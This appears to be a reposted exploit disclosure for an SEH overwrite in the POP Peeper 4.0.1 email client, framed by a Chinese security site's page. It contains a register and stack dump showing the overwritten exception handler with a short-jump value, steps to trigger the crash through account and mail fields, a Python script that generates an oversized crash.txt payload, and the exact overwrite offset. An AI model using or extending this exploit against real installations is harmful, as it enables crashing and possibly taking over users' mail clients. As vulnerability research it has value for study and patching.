|
POP Peeper 4.0.1 - SEH Over-Write
|
|
来源:vfocus.net 作者:Un_N0n 发布时间:2015-11-10
|
|
'''
********************************************************************************************
# Exploit Title: POP Peeper SEH Over-write.
# Date: 9/14/2015
# Exploit Author: Un_N0n
# Software Link: http://www.esumsoft.com/download
# Version: v4.0.1
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************
[DUMP:]
'''
EAX 00000000
ECX 20203029
EDX 77C5660D ntdll.77C5660D
EBX 00000000
ESP 0012EC5C
EBP 0012EC7C
ESI 00000000
EDI 00000000
EIP 20203029
==============================
STACK:
0012FBF4 41414141
0012FBF8 41414141
0012FBFC 41414141
0012FC00 41414141
0012FC04 41414141
0012FC08 909020EB Pointer to next SE>
0012FC0C 20203029 SE handler
0012FC10 43434343
0012FC14 43434343
0012FC18 43434343
0012FC1C 43434343
0012FC20 43434343
0012FC24 43434343
0012FC28 43434343
===============================
'''
[Steps to Produce the Crash]:
1- Open 'POPPeeper.exe'
2- Goto Accounts->Add->CreateSingleAccount.
3- After entering the email address, the option for Account name will appear,
enter the contents of crash.txt in it->Save.
4- Then compose a new mail->In TO field and Subject field, enter the contents of crash.txt
5- Save as Draft, software will crash.
6- Open up "POPPeeper.exe" again.
7- Click on Check Mail option, Software will crash.
Everytime you click on Check mail, it will crash as it will load the saved DRAFT.
[Code to produce CRASH.txt]
'''
buffer = "A"*66666
file = "crash.txt"
f = open(file,'w')
f.write(buffer)
f.close()
'''
[Extra Info:]
Offset : 2052
**********************************************************************************************
'''
|
| |
|
[ 推荐]
[ 评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
| |
|
|
 |
|
推荐广告 |
|
|
|
|
|
